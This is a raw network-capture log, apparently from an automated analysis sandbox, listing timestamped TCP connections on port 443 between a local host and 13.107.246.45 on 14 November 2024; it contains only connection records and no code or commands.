                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.740451097 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.740511894 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.740567923 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.740577936 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.740602970 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.740607023 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.743921995 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.743953943 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.744275093 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.744396925 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.744410038 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.786158085 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.786206961 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.786287069 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.786696911 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.786700964 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.786742926 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.786746979 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.789834023 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.789853096 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.789952040 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.790079117 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.790088892 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.919172049 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:31.919182062 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.440253973 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.440741062 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.440829039 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.441476107 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.441492081 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.463428020 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.464191914 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.464211941 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.465214968 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.465229034 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.533415079 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.533879042 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.533901930 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.534395933 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.534401894 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.555305958 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.555671930 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.555684090 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.556045055 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.556050062 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.569832087 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.569890976 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.569943905 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.570148945 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.570161104 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.570183992 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.570188999 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.572375059 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.572412968 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.572603941 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.572741032 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.572747946 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.578197002 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.578483105 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.578497887 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.578963995 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.578969955 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.611735106 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.611816883 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.611921072 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.611994028 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.611994028 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.612010002 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.612018108 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.614126921 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.614166975 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.614226103 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.614389896 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.614401102 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.665280104 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.665488005 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.665538073 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.665584087 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.665597916 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.665622950 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.665628910 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.667932034 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.667968988 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.668029070 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.668138981 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.668154001 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.686362028 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.687004089 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.687074900 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.687146902 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.687148094 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.687187910 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.687222004 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.688874006 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.688909054 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.688990116 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.689100027 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.689112902 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.706947088 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.707007885 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.707132101 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.707132101 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.707170963 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.707180977 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.709085941 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.709172964 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.709268093 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.709379911 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:32.709412098 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.314817905 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.315623999 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.315649033 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.316456079 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.316461086 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.382520914 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.382927895 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.382961035 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.383497000 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.383505106 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.405739069 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.406351089 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.406383991 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.407021046 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.407026052 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.436887026 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.437339067 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.437360048 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.437942982 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.437947035 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.445308924 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.445446968 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.445492983 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.445805073 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.445817947 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.445827007 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.445832968 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.448839903 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.448929071 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.449119091 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.449451923 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.449490070 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.464776039 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.465605021 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.465625048 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.466804981 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.466823101 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.516300917 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.516537905 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.516602993 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.516639948 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.516639948 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.516658068 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.516669035 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.519964933 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.519992113 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.520040035 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.520309925 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.520327091 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.536432028 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.536664009 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.536716938 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.549789906 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.549802065 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.549834967 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.549839020 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.553153992 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.553225040 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.553323030 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.553606987 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.553639889 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.566375971 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.566450119 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.566517115 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.566679001 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.566694021 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.567003012 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.567008018 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.569186926 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.569200993 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.569425106 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.569567919 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.569582939 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.595819950 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.596005917 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.596271992 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.596410990 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.596438885 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.596466064 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.596478939 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.600142956 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.600172043 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.600240946 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.600445032 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.600460052 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.182776928 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.183425903 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.183516026 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.183726072 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.183742046 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.259171009 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.294636965 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.295576096 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.309811115 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.312868118 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.312953949 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.313131094 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.341059923 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.341176033 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.345006943 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.345019102 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.349011898 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.358402014 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.358411074 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.358799934 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.358817101 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.358989954 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.358989954 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.359061003 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.359098911 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.359128952 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.359139919 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.385220051 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.385246992 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.394364119 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.394372940 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.402468920 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.402523994 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.402899981 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.402915955 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.433474064 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.433502913 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.433641911 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.434451103 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.434465885 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.485367060 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.485439062 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.485503912 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.486093044 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.486108065 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.486119032 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.486125946 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.488795996 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.489471912 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.489564896 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.490958929 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.490958929 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.490977049 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.490998030 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.496115923 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.496146917 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.496226072 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.496634007 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.496664047 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.496931076 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.497422934 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.497437954 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.497713089 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.497725010 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.518587112 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.518928051 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.518985987 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.519594908 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.519599915 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.519612074 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.519617081 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.525134087 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.525142908 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.525307894 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.525645018 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.525662899 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.534418106 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.534476995 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.534614086 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.535177946 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.535177946 CET49821443192.168.2.413.107.246.45
